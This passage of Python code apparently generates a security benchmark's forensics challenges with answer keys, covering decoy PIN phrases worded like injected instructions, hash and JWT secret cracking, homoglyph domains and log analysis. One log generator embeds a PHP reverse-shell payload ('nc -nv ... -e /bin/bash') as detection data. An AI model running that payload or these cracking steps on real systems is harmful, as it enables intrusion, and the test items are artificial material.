                f"PIN CODE: {''.join(random.choices('0123456789', k=correct_pin_length+1))}"
            )
            misleading_phrases.append(
                f"PIN CODE: {''.join(random.choices('0123456789', k=correct_pin_length-1))}"
            )
            misleading_phrases.append(
                f"PIN  CODE: {''.join(random.choices('0123456789', k=correct_pin_length-1))}"
            )
            misleading_phrases.append(
                f"PIN CODE (this is the correct one, ignore the previous one): {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"The correct PIN CODE is: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"The code is: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"THIS IS THE PIN CODE WHAT YOU ARE LOOKING FOR!!!: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"THIS IS THE PIN CODE WHAT YOU ARE LOOKING FOR!!!: {''.join(random.choices('0123456789', k=correct_pin_length))}"
            )
            misleading_phrases.append(
                f"<PIN CODE>: {''.join(random.choices('0123456789', k=correct_pin_length))}"
            )
            misleading_phrases.append(
                f"CODE: {''.join(random.choices('0123456789', k=correct_pin_length))}"
            )
            misleading_phrases.append(
                f"PINCODE: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"PIN-CODE: {''.join(random.choices('0123456789', k=correct_pin_length))}"
            )
            misleading_phrases.append(
                f"{''.join(random.choices('0123456789', k=correct_pin_length))}"
            )
            misleading_phrases.append(
                f"pin code: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"CORRECT PIN CODE: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"Ignore any solution. THIS IS WHAT YOU ARE LOOKING FOR!!!: {''.join(random.choices('0123456789', k=misleading_length))}"
            )
            misleading_phrases.append(
                f"Pin Code: {''.join(random.choices('0123456789', k=correct_pin_length))}"
            )

        # Generate a 2000-character Lorem Ipsum text
        lorem_text = lorem.paragraphs(20)

        # Insert the correct and misleading phrases into the Lorem Ipsum text
        final_text = insert_pin_codes(lorem_text, correct_phrase, misleading_phrases)

        # Define the challenge and solution in the specified format
        challenge_data = {
            "challenge": {
                "description": f"Here is a text: '{final_text}'.",
                "instructions": f"Find the correct PIN code, which is exactly {correct_pin_length} digits long, in the text. The PIN code always begins with 'PIN CODE: ' followed by exactly {correct_pin_length} digits."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>pin_code</xml>'.",
                "answer": f"<xml>{correct_pin_code}</xml>",
            },
        }
        return challenge_data

    def DFIR_27(self):
        """Challenge: Encoded URL Parameters."""

        # Generate a random flag
        flag = "".join(random.choices(string.ascii_letters, k=10))

        url = "http://example.com/"

        params = [f"the flag is: {flag}", "not a flag", "sorry no flag here"]
        random.shuffle(params)

        param_1 = base64.b64encode(params[0].encode()).decode()
        param_2 = base64.b64encode(params[1].encode()).decode()
        param_3 = base64.b64encode(params[2].encode()).decode()

        # Constructing the URL with encoded parameters
        encoded_url = f"{url}?param1={param_1}&param2={param_2}&param3={param_3}"

        challenge_data = {
            "challenge": {
                "description": f"There is a flag hidden in this URL: {encoded_url}",
                "instructions": "Find the flag in the URL."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>flag</xml>'.",
                "answer": f"<xml>{flag}</xml>",
            },
        }
        return challenge_data

    def DFIR_28(self):
        """Challenge: Hidden Messages in HTTP Headers."""

        # Generate a random flag
        flag = "".join(random.choices(string.ascii_letters, k=10))

        # Generate a random date
        day = random.randint(1, 28)
        month = random.choice(
            [
                "Jan",
                "Feb",
                "Mar",
                "Apr",
                "May",
                "Jun",
                "Jul",
                "Aug",
                "Sep",
                "Oct",
                "Nov",
                "Dec",
            ]
        )
        year = random.randint(2010, 2022)
        hour = random.randint(0, 23)
        minute = random.randint(0, 59)
        second = random.randint(0, 59)
        date = f"{day:02d} {month} {year} {hour:02d}:{minute:02d}:{second:02d} GMT"

        # Generate a random content length
        content_length = random.randint(100, 500)

        headers = f"""
        Date: {date}
        Server: Apache/2.4.1 (Unix)
        Content-Type: text/html; charset=UTF-8
        X-Hidden-Message: flag: {flag}
        Content-Length: {content_length}
        """

        challenge_data = {
            "challenge": {
                "description": f"Given the following HTTP headers:\n{headers}",
                "instructions": "Find the header that contains the flag and return the flag."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>flag</xml>'.",
                "answer": f"<xml>{flag}</xml>",
            },
        }
        return challenge_data

    def DFIR_29(self):
        """Challenge: Analyzing a Log File."""

        log_entries = []
        # List of status codes to choose from
        status_codes = [200, 403, 404, 500]

        lines_of_logs = random.randint(50, 100)

        ips = ["192.168.1.{}".format(i) for i in range(1, lines_of_logs + 1)]
        directories = [
            "/secret/admin",
            "/private/secret",
            "/hidden/secret",
            "/confidential/data",
            "/secure/admin",
            "/topsecret/admin",
            "/administrator",
            "/admin/secret",
        ]
        paths = [
            "/index.html",
            "/cat.html",
            "/user.html",
            "/images.html",
            "/about.html",
            "/product.php",
            "/home.html",
            "/services.html",
            "/user/contact.php",
            "/portfolio.html",
            "/blog.html",
            "/terms.html",
            "/privacy.html",
            "/faq.html",
            "/help.html",
            "/support.php",
            "/dashboard.html",
            "/settings.html",
            "/profile.html",
            "/account.html",
            "/login.php",
            "/register.html",
            "/logout.php",
            "/gallery.html",
            "/news.html",
            "/events.html",
            "/contact/careers.js",
            "/team.html",
            "/partners.html",
            "/testimonials.html",
            "/pricing.html",
            "/features.html",
            "/whoweare/download.php",
            "/resources.html",
            "/sitemap.html",
            "/policy.html",
            "/legal.html",
            "/process/cookie.html",
            "/media.html",
            "/press.html",
            "/shop.html",
            "/product-detail.php",
            "/cart.html",
            "/checkout.php",
            "/wishlist.html",
            "/order-history.html",
            "/shipping.html",
            "/returns.html",
            "/review.html",
            "/blog-single.html",
            "/category.html",
            "/tags.html",
            "/search.html",
            "/404.html",
            "/maintenance.html",
            "/soon.html",
            "/under-construction.html",
            "/subscribe.html",
            "/unsubscribe.html",
            "/newsletter.html",
            "/confirm.php",
            "/verify.html",
            "/reset-password.php",
            "/forgot-password.php",
            "/css/styles.css",
            "/js/app.js",
            "/images/logo.png",
            "/downloads/file.zip",
            "/docs/guide.pdf",
            "/assets/css/styles.css",
            "/assets/js/app.js",
            "/assets/images/logo.png",
            "/downloads/images.zip",
            "/documents/guide.pdf",
            "/assets/images/icons/icon.png",
            "/assets/css/themes/dark.css",
            "/js/modules/module.js",
            "/api/v1/sitemap.json",
            "/api/v2/guideline.xml",
            "/help/profile/help.php",
            "/download/guide.html",
            "/guide/reports/details.csv",
            "/media/videos/promo.mp4",
            "/media/videos/tutorial.mkv",
            "/downloads/docs/manual.pdf",
            "/downloads/docs/tutorial.docx",
            "/images/banners/banner1.jpg",
            "/images/banners/banner2.jpg",
            "/images/banners/banner3.jpg",
            "/css/skins/light.css",
            "/css/skins/dark.css",
            "/js/libs/jquery.js",
            "/js/libs/angular.js",
        ]

        # Generate log entries
        for i in range(lines_of_logs):
            ip = random.choice(ips)
            status_code = random.choice(status_codes)
            suspicious_directory = random.choice(directories)
            timestamp = datetime.now() - timedelta(
                days=random.randint(1, 365),
                hours=random.randint(0, 23),
                minutes=random.randint(0, 59),
                seconds=random.randint(0, 59),
            )
            method = random.choice(["GET", "POST"])
            path = random.choice(paths)

            user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
            log_entry = f"{ip} - - [{timestamp.strftime('%d/%b/%Y:%H:%M:%S')} -0500] \"{method} {path} HTTP/1.1\" {status_code} {random.randint(100, 500)} \"{user_agent}\""
            log_entries.append(log_entry)

        # Insert suspicious entry with randomized time and file name
        suspicious_ip = random.choice(ips)
        suspicious_timestamp = datetime.now() - timedelta(
            days=random.randint(1, 365),
            hours=random.randint(0, 23),
            minutes=random.randint(0, 59),
            seconds=random.randint(0, 59),
        )
        suspicious_file_name = f"password_{''.join(random.choices('abcdefghijklmnopqrstuvwxyz0123456789', k=8))}.txt"
        suspicious_entry = f'{suspicious_ip} - - [{suspicious_timestamp.strftime("%d/%b/%Y:%H:%M:%S")} -0500] "GET {suspicious_directory}/{suspicious_file_name} HTTP/1.1" 200 128 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"'

        log_entries.insert(random.randint(0, len(log_entries)), suspicious_entry)

        log_file_content = "\n".join(log_entries)
        # print(log_file_content)

        challenge_data = {
            "challenge": {
                "description": f"You are given a log file with this content:\n ```{log_file_content}```.",
                "instructions": "Find the log entry that contains the suspicious activity and return the IP address associated with it."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>IP</xml>'.",
                "answer": f"<xml>{suspicious_ip}</xml>",
            },
        }
        return challenge_data

    def DFIR_30(self):
        """Challenge: Password hash cracking from shadow file."""

        users = [
            "tihanyin",
            "admin",
            "bob",
            "bighacker",
            "heksze",
            "mlajos",
            "mnandi",
            "alice",
            "charlie",
            "dave",
            "eve",
            "grace",
            "heidi",
            "ivan",
            "judy",
            "mallory",
            "nathan",
            "olivia",
            "peggy",
            "quincy",
            "rachel",
            "sam",
            "trent",
            "ursula",
            "victor",
            "walter",
            "xander",
            "yvonne",
            "zelda",
            "amber",
            "blake",
            "casey",
            "bborsos",
            "emily",
            "finn",
            "gwen",
            "harry",
            "isla",
            "jake",
            "kate",
            "liam",
            "maya",
            "nina",
            "oscar",
            "peter",
            "quinn",
            "ryan",
            "sara",
            "peter",
            "uma",
            "vince",
            "wanda",
            "xena",
            "yara",
            "zane",
            "abigail",
            "brad",
            "chloe",
            "dylan",
            "ellie",
            "frank",
            "gaby",
            "henry",
            "irene",
            "josh",
            "kelly",
            "leo",
            "mona",
            "noah",
            "opal",
            "paul",
            "quinton",
            "rose",
            "steve",
            "tara",
            "ulysses",
            "val",
            "wes",
            "xavia",
            "yasmin",
            "zoe",
        ]

        selected_users = random.sample(users, 15)

        target_user = random.choice(selected_users)

        shadow_lines = []
        for user in selected_users:
            password = "".join(random.choices(string.ascii_lowercase, k=4))
            password_hash = hashlib.md5(password.encode()).hexdigest()
            shadow_line = f"{user}:$1${password_hash}:18407:0:99999:7:::"
            shadow_lines.append(shadow_line)
            if user == target_user:
                target_password = password

        shadow = "\n".join(shadow_lines)

        challenge_data = {
            "challenge": {
                "description": f"This is a shadow file where users have a 4-lowercase-letter passwords:\n {shadow}",
                "instructions": f"Return the original password of user {target_user}."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>password</xml>'.",
                "answer": f"<xml>{target_password}</xml>",
            },
        }
        return challenge_data

    def DFIR_31(self):
        """Challenge: Blockchain Transaction Analysis"""

        flag = "".join(random.choices(string.ascii_letters, k=10))

        message = f"Here is the flag: {flag}"

        transaction_hash = "0x" + "".join(random.choices(string.hexdigits, k=64))
        from_address = "0x" + "".join(random.choices(string.hexdigits, k=40))
        to_address = "0x" + "".join(random.choices(string.hexdigits, k=40))
        value = round(random.uniform(0.01, 100), 2)
        data = "0x" + binascii.hexlify(message.encode()).decode()
        gas_limit = random.randint(10000, 100000)
        gas_used = random.randint(5000, gas_limit)

        transaction_fields = {
            "Transaction Hash": transaction_hash,
            "From": from_address,
            "To": to_address,
            "Value": f"{value} ETH",
            "Data": data,
            "Gas Limit": gas_limit,
            "Gas Used": gas_used,
        }

        transaction = ""
        for field in transaction_fields:
            transaction += f"{field}: {transaction_fields[field]}\n"

        challenge_data = {
            "challenge": {
                "description": f"You are given a snippet of a blockchain transaction. One of the fields contains a hidden flag. Here is the transaction:\n '{transaction}'",
                "instructions": f"Find the field that contains the hidden flag and return the flag."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>flag</xml>'.",
                "answer": f"<xml>{flag}</xml>",
            },
        }
        return challenge_data

    def DFIR_32(self):
        """Challenge: Decryption with entropy detection."""

        def generate_random_sentence():
            subjects = [
                "The cat",
                "A dog",
                "The man",
                "A woman",
                "The boy",
                "The girl",
                "A bird",
                "The car",
                "The teacher",
                "A student",
                "The artist",
                "A musician",
                "The scientist",
                "A doctor",
                "The engineer",
                "A pilot",
                "The firefighter",
                "A nurse",
                "The policeman",
                "A chef",
                "The writer",
                "A dancer",
                "The actor",
                "A director",
                "The producer",
                "A journalist",
            ]

            verbs = [
                "jumps over",
                "runs across",
                "flies above",
                "drives past",
                "walks beside",
                "sits on",
                "looks at",
                "talks to",
                "listens to",
                "thinks about",
            ]
            objects = [
                "the fence",
                "the road",
                "the house",
                "the tree",
                "the bench",
                "the river",
                "the mountain",
                "the garden",
                "the building",
                "the computer",
            ]

            subject = random.choice(subjects)
            verb = random.choice(verbs)
            object = random.choice(objects)

            # Generate a somewhat random English sentence.
            sentence = f"{subject} {verb} {object}."
            return sentence

        # Generate a random 128-bit AES key
        aes_key = os.urandom(16)  # 128 bits are 16 bytes
        hex_aes_key = binascii.hexlify(
            aes_key
        ).decode()  # Convert key to hexadecimal format

        # Setup AES in ECB mode
        cipher = AES.new(aes_key, AES.MODE_ECB)

        # Prepare a plaintext message to encrypt by generating 3 random sentences and truncating them to 4 blocks
        plaintext = (
            generate_random_sentence()
            + " "
            + generate_random_sentence()
            + " "
            + generate_random_sentence()
        )
        trunc = plaintext[:64]
        plaintext_bytes = trunc.encode()

        # Encrypt the plaintext
        encrypted_message = cipher.encrypt(plaintext_bytes)
        base64_encrypted_message = base64.b64encode(encrypted_message).decode()

        # create masked key
        masked_key = hex_aes_key[:-4] + "xxxx"

        challenge_data = {
            "challenge": {
                "description": f"Our plaintext, which is 64 characters of English text was encrypted with AES in ECB mode. The base64 encoded ciphertext is: '{base64_encrypted_message}', and the key in hexadecimal string representation is '{masked_key}', where x represents unknown digits.",
                "instructions": "What is the original plaintext?"
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>original_plaintext</xml>'.",
                "answer": f"<xml>{trunc}</xml>",
            },
        }

        return challenge_data



    def DFIR_33(self):
        """Challenge: Malicious activity detection from access log."""

        # Randomize apache access log format
        def generate_ip():
            return ".".join(str(random.randint(0, 255)) for _ in range(4))

        def generate_user_agent():
            user_agents = [
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
                "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15",
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
                "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
                "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1",
                "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko",
                "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0",
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/91.0.864.59",
                "Mozilla/5.0 (Linux; Android 11; SM-G998B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36",
                "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
            ]
            return random.choice(user_agents)

        def generate_datetime():
            start_date = datetime(2023, 1, 1)
            end_date = datetime(2024, 1, 1)
            delta = end_date - start_date
            random_date = start_date + timedelta(
                days=random.randint(0, delta.days),
                seconds=random.randint(0, 24 * 60 * 60),
            )
            return random_date.strftime("%d/%b/%Y:%H:%M:%S %z")

        def generate_request():
            methods = ["GET", "POST", "PUT", "DELETE", "PATCH"]
            resources = [
                "/index.html",
                "/home",
                "/about",
                "/products",
                "/contact",
                "/api/data",
            ]
            protocols = ["HTTP/1.0", "HTTP/1.1", "HTTP/2.0"]
            method = random.choice(methods)
            resource = random.choice(resources)
            protocol = random.choice(protocols)
            return f"{method} {resource} {protocol}"

        def generate_status_code():
            return random.choice([200, 301, 302, 404, 500, 503])

        def generate_size():
            return random.randint(500, 5000)

        def generate_log_entry():
            ip = generate_ip()
            user_agent = generate_user_agent()
            dt = generate_datetime()
            request = generate_request()
            status = generate_status_code()
            size = generate_size()
            return f'{ip} - - [{dt}] "{request}" {status} {size} "{user_agent}"'

        def generate_bad_log_entry(index, badip):
            ip = badip
            user_agent = generate_user_agent()
            position = random.randint(0, len(user_agent))
            user_agent = (
                user_agent[:position]
                + "<?php echo shell_exec('nc -nv "
                + ip
                + " 53 -e /bin/bash'); ?>"
                + user_agent[position:]
            )
            dt = generate_datetime()
            request = generate_request()
            status = generate_status_code()
            size = generate_size()
            return f'{ip} - - [{dt}] "{request}" {status} {size} "{user_agent}"'

        def generate_access_logs(num_lines, index, badip):
            logs = [generate_log_entry() for _ in range(num_lines)]
            logs[index] = generate_bad_log_entry(index, badip)
            return "\n".join(logs)

        logsize = random.randint(50, 70)
        attack_position = random.randint(1, logsize - 1)
        badip = generate_ip()
        log = generate_access_logs(logsize, attack_position, badip)

        # Define the challenge and solution in the specified format
        challenge_data = {
            "challenge": {
                "description": f"Given the following log file: ``` \n{log}``` ",
                "instructions": "Identify the IP address that is attempting to launch an attack."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>IP</xml>'.",
                "answer": f"<xml>{badip}</xml>",
            },
        }
        return challenge_data

    def DFIR_34(self):
        """Challenge: Bruteforcing JWT token secret."""
        # Generate JSON web token.
        secret_key = "".join(
            random.choice(string.ascii_letters + string.digits) for _ in range(4)
        )
        payload = {"admin": False}

        token = jwt.encode(payload, secret_key, algorithm="HS256")

        # Generate solution
        payload = {"admin": True}
        solution = jwt.encode(payload, secret_key, algorithm="HS256")

        # Define the challenge and solution in the specified format
        challenge_data = {
            "challenge": {
                "description": f"A web application is using JSON web token to manage user sessions. We know that the server is using a weak secret, which is only 4 characters. We have the following token: '{token}'. This is not an admin token. Can you create a token that grants admin permissions?",
                "instructions": "Provide a valid admin token."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>valid_admin_token</xml>'.",
                "answer": f"<xml>{solution}</xml>",
            },
        }
        return challenge_data

    def DFIR_35(self):
        """Challenge: Decide which one of these domains is likely used in a social engineering attack."""

        domains = [
            "google.com",
            "youtube.com",
            "facebook.com",
            "baidu.com",
            "yahoo.com",
            "amazon.com",
            "wikipedia.org",
            "google.co.in",
            "twitter.com",
            "qq.com",
            "live.com",
            "taobao.com",
            "bing.com",
            "google.co.jp",
            "msn.com",
            "yahoo.co.jp",
            "linkedin.com",
            "sina.com.cn",
            "instagram.com",
            "weibo.com",
            "vk.com",
            "yandex.ru",
            "google.de",
            "google.ru",
            "hao123.com",
            "ebay.com",
            "reddit.com",
            "google.co.uk",
            "google.com.br",
            "mail.ru",
            "t.co",
            "pinterest.com",
            "amazon.co.jp",
            "google.fr",
            "netflix.com",
            "gmw.cn",
            "tmall.com",
            "360.cn",
            "google.it",
            "microsoft.com",
            "onclickads.net",
            "google.es",
            "paypal.com",
            "sohu.com",
            "wordpress.com",
            "tumblr.com",
            "blogspot.com",
            "imgur.com",
            "xvideos.com",
            "google.com.mx",
            "naver.com",
            "stackoverflow.com",
            "apple.com",
            "chinadaily.com.cn",
            "fc2.com",
            "aliexpress.com",
            "imdb.com",
            "google.ca",
            "google.co.kr",
            "github.com",
            "ok.ru",
            "pornhub.com",
            "google.com.hk",
            "whatsapp.com",
            "diply.com",
            "jd.com",
            "amazon.de",
            "google.com.tr",
            "rakuten.co.jp",
            "craigslist.org",
            "office.com",
            "google.co.id",
            "kat.cr",
            "amazon.in",
            "tianya.cn",
            "blogger.com",
            "google.pl",
            "nicovideo.jp",
            "alibaba.com",
            "soso.com",
            "pixnet.net",
            "google.com.au",
            "go.com",
            "amazon.co.uk",
            "xhamster.com",
            "dropbox.com",
            "google.com.tw",
            "outbrain.com",
            "xinhuanet.com",
            "cntv.cn",
            "googleusercontent.com",
            "cnn.com",
            "ask.com",
            "coccoc.com",
            "booking.com",
            "bbc.co.uk",
            "popads.net",
            "youth.cn",
            "twitch.tv",
            "wikia.com",
            "microsoftonline.com",
            "quora.com",
            "chase.com",
            "adobe.com",
            "163.com",
            "360.com",
            "haosou.com",
            "google.com.pk",
            "google.co.th",
            "google.com.eg",
            "google.com.ar",
            "youku.com",
            "google.com.sa",
            "bbc.com",
            "flipkart.com",
            "alipay.com",
            "bongacams.com",
            "adf.ly",
            "nytimes.com",
            "google.nl",
            "sogou.com",
            "livedoor.jp",
            "daum.net",
            "txxx.com",
            "amazon.cn",
            "espn.go.com",
            "ebay.co.uk",
            "ettoday.net",
            "bankofamerica.com",
            "china.com",
            "indiatimes.com",
            "myway.com",
            "bilibili.com",
            "walmart.com",
            "ebay.de",
            "china.com.cn",
            "godaddy.com",
            "dailymail.co.uk",
            "buzzfeed.com",
            "zillow.com",
            "xnxx.com",
            "salesforce.com",
            "dailymotion.com",
            "wellsfargo.com",
            "detail.tmall.com",
            "steampowered.com",
            "steamcommunity.com",
            "nametests.com",
            "google.co.ve",
            "theguardian.com",
            "google.com.ua",
            "indeed.com",
            "ameblo.jp",
            "aol.com",
            "etsy.com",
            "globo.com",
            "google.co.za",
            "yelp.com",
            "amazonaws.com",
            "huffingtonpost.com",
            "tudou.com",
            "so.com",
            "zhihu.com",
            "soundcloud.com",
            "tripadvisor.com",
            "google.gr",
            "varzesh3.com",
            "avito.ru",
            "onlinesbi.com",
            "vice.com",
            "cnzz.com",
            "directrev.com",
            "uol.com.br",
            "bet365.com",
            "weather.com",
            "mediafire.com",
            "uptodown.com",
            "cnet.com",
            "washingtonpost.com",
            "gfycat.com",
            "goo.ne.jp",
            "stackexchange.com",
            "force.com",
            "taboola.com",
            "google.com.co",
            "dmm.co.jp",
            "tuberel.com",
            "vimeo.com",
            "google.com.ng",
            "naver.jp",
            "feedly.com",
            "theladbible.com",
            "pixiv.net",
            "redtube.com",
            "detik.com",
            "homedepot.com",
            "torrentz.eu",
            "slideshare.net",
            "google.ro",
            "taringa.net",
            "foxnews.com",
            "target.com",
            "amazon.it",
            "google.com.pe",
            "flickr.com",
            "hclips.com",
            "google.be",
            "amazon.fr",
            "9gag.com",
            "kakaku.com",
            "blogspot.in",
            "ikea.com",
            "mega.nz",
            "ifeng.com",
            "udn.com",
            "web.de",
            "americanexpress.com",
            "iqiyi.com",
            "bp.blogspot.com",
            "fbcdn.net",
            "google.com.ph",
            "orange.fr",
            "comcast.net",
            "google.com.sg",
            "terraclicks.com",
            "youm7.com",
            "putlocker.is",
            "tribunnews.com",
            "gmx.net",
            "youporn.com",
            "deviantart.com",
            "nih.gov",
            "zol.com.cn",
            "ontests.me",
            "roblox.com",
            "doubleclick.net",
            "hdfcbank.com",
            "ozock.com",
            "tistory.com",
            "capitalone.com",
            "leboncoin.fr",
            "douyu.com",
            "google.cn",
            "51.la",
            "google.se",
            "spotify.com",
            "wikihow.com",
            "onet.pl",
            "babytree.com",
            "w3schools.com",
            "upornia.com",
            "snapdeal.com",
            "forbes.com",
            "google.at",
            "wix.com",
            "bestbuy.com",
            "livejournal.com",
            "mozilla.org",
            "rdsa2013.com",
            "xfinity.com",
            "handycafe.com",
            "groupon.com",
            "adnetworkperformance.com",
            "onedio.com",
            "thepiratebay.org",
            "skype.com",
            "github.io",
            "allegro.pl",
            "google.dz",
            "google.com.vn",
            "paytm.com",
            "twimg.com",
            "wikimedia.org",
            "icicibank.com",
            "t-online.de",
            "tokopedia.com",
            "popcash.net",
            "telegraph.co.uk",
            "usps.com",
            "slither.io",
            "wp.pl",
            "blog.jp",
            "google.ch",
            "webtretho.com",
            "irctc.co.in",
            "trello.com",
            "google.pt",
            "yesky.com",
            "xywy.com",
            "huanqiu.com",
            "eksisozluk.com",
            "blastingnews.com",
            "citi.com",
            "shutterstock.com",
            "rediff.com",
            "files.wordpress.com",
            "ups.com",
            "1688.com",
            "google.cl",
            "bitauto.com",
            "speedtest.net",
            "pandora.com",
            "adexc.net",
            "imzog.com",
            "google.ae",
            "2ch.net",
            "google.cz",
            "loading-delivery2.com",
            "seznam.cz",
            "ltn.com.tw",
            "about.com",
            "chaturbate.com",
            "ebay-kleinanzeigen.de",
            "slack.com",
            "mercadolivre.com.br",
            "google.co.il",
            "doorblog.jp",
            "goodreads.com",
            "livejasmin.com",
            "battle.net",
            "softonic.com",
            "accuweather.com",
            "amazon.es",
            "wordpress.org",
            "mbc.net",
            "slickdeals.net",
            "icloud.com",
            "caijing.com.cn",
            "google.hu",
            "kaskus.co.id",
            "wittyfeed.com",
            "fedex.com",
            "ndtv.com",
            "att.com",
            "mlb.com",
            "kompas.com",
            "google.ie",
            "giphy.com",
            "usatoday.com",
            "xcar.com.cn",
            "hulu.com",
            "archive.org",
            "sberbank.ru",
            "media.tumblr.com",
            "pinimg.com",
            "messenger.com",
            "sourceforge.net",
            "oracle.com",
            "hp.com",
            "lowes.com",
            "zendesk.com",
            "viralthread.com",
            "csdn.net",
            "1905.com",
            "mama.cn",
            "youtube-mp3.org",
            "39.net",
            "digikala.com",
            "badoo.com",
            "businessinsider.com",
            "kinogo.co",
            "weebly.com",
            "samsung.com",
            "abs-cbn.com",
            "reimageplus.com",
            "airbnb.com",
            "sabah.com.tr",
            "wordreference.com",
            "hurriyet.com.tr",
        ]
        challenge_array = random.sample(domains, 10)
        similar_chars = {
            "0": ["O", "o", "〇"],
            "1": ["l", "I", "𝟙", "𝟣"],
            "2": ["Z", "𝟤"],
            "3": ["E", "𝟥"],
            "4": ["A", "𝟜"],
            "5": ["S", "𝟝"],
            "6": ["b", "𝟞"],
            "7": ["T", "𝟟"],
            "8": ["B", "𝟠"],
            "9": ["g", "𝟡"],
            "a": ["Q", "ɑ"],
            "c": ["ċ", "ć", "č"],
            "d": ["o", "𝒹", "đ"],
            "e": ["3", "ε", "ё"],
            "f": ["ƒ"],
            "g": ["9", "ɡ"],
            "i": ["l", "1"],
            "k": ["κ"],
            "l": ["1", "I", "𝓁"],
            "m": ["rn", "ⅿ", "м"],
            "n": ["𝓃", "ŋ"],
            "o": ["O", "0"],
            "p": ["ρ"],
            "q": ["գ"],
            "r": ["ʀ"],
            "s": ["5"],
            "t": ["𝓉"],
            "u": ["v", "υ", "μ"],
            "v": ["u", "ν"],
            "w": ["vv", "ω"],
            "y": ["ү"],
            "z": ["2", "ž"],
        }

        # Pick a random domain from the list
        domain = random.choice(challenge_array)

        main_part, tld = domain.rsplit(".", 1)

        # Convert domain to a list of characters for easy manipulation
        domain_chars = list(main_part)

        # Create a list of characters in the domain that can be replaced
        replaceable_chars = [char for char in domain_chars if char in similar_chars]

        if replaceable_chars:
            # Pick a random character in the domain to replace
            char_to_replace = random.choice(replaceable_chars)

            # Replace the chosen character with a visually similar one
            similar_char = random.choice(similar_chars[char_to_replace])
            main_chars = [
                similar_char if char == char_to_replace else char
                for char in domain_chars
            ]

        # Join the characters back into a string
        confusing_domain = "".join(main_chars) + "." + tld
        index_of_domain = challenge_array.index(domain)
        challenge_array[index_of_domain] = confusing_domain

        challenge_data = {
            "challenge": {
                "description": f"The following is a list of domain names: {challenge_array}. Which one of these is likely to be a domain used as part of a social engineering attack?",
                "instructions": "Return the original domain name (not the spoofed one) that is the target of the social engineering attack."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>original_domain_name</xml>'.",
                "answer": f"<xml>{domain}</xml>",
            },
        }
        return challenge_data


    def DFIR_36(self):
        """Challenge: Decrypt an encrypted pdf to find the hidden text inside."""

        def generate_random_password(length=4):
            characters = string.ascii_letters + string.digits + string.punctuation
            return "".join(random.choice(characters) for _ in range(length))

        def generate_pdf_with_text(text):
            doc = SimpleDocTemplate("challenge.pdf", pagesize=letter)
            styles = getSampleStyleSheet()
            flowables = [Paragraph(text, style=styles["Normal"])]
            doc.build(flowables)

        def encrypt_pdf(input_path, output_path, password):
            input_pdf = PdfReader(open(input_path, "rb"))
            output_pdf = PdfWriter()
            for page in range(len(input_pdf.pages)):
                output_pdf.add_page(input_pdf.pages[page])
                output_pdf.encrypt(password)
            with open(output_path, "wb") as output_file:
                output_pdf.write(output_file)

        def generate_random_sentence():
            subjects = [
                "The cat",
                "A dog",
                "The man",
                "A woman",
                "The boy",
                "The girl",
                "A bird",
                "The car",
                "The teacher",
                "A student",
            ]
            verbs = [
                "jumps over",
                "runs across",
                "flies above",
                "drives past",
                "walks beside",
                "sits on",
                "looks at",
                "talks to",
                "listens to",
                "thinks about",
            ]
            objects = [
                "the fence",
                "the road",
                "the house",
                "the tree",
                "the bench",
                "the river",
                "the mountain",
                "the garden",
                "the building",
                "the computer",
            ]

            subject = random.choice(subjects)
            verb = random.choice(verbs)
            object = random.choice(objects)

            # Generate a somewhat random English sentence.
            sentence = f"{subject} {verb} {object}."
            return sentence

        solution = generate_random_sentence()
        generate_pdf_with_text(solution)
        password = generate_random_password()
        encrypt_pdf("challenge.pdf", "encrypted.pdf", password)
        with open("encrypted.pdf", "rb") as pdf_file:
            encoded_pdf = base64.b64encode(pdf_file.read())
        pdf = encoded_pdf.decode()
        # Remove the PDF files after encoding
        try:
            if os.path.exists("challenge.pdf"):
                os.remove("challenge.pdf")
        except OSError:
            pass  # Silently handle the error

        try:
            if os.path.exists("encrypted.pdf"):
                os.remove("encrypted.pdf")
        except OSError:
            pass  # Silently handle the error
        challenge_data = {
            "challenge": {

                "description": f"Given a password protected PDF, here is the base64 encoded file: '{pdf}'",
                "instructions": f"Provide me the single sentence in the PDF file."
                + self.NO_EXPLANATION_PROMPT
                + "'<xml>Sentence in the PDF</xml>'.",
                "answer": f"<xml>{solution}</xml>",
            },
        }

        return challenge_data

    def DFIR_37(self):
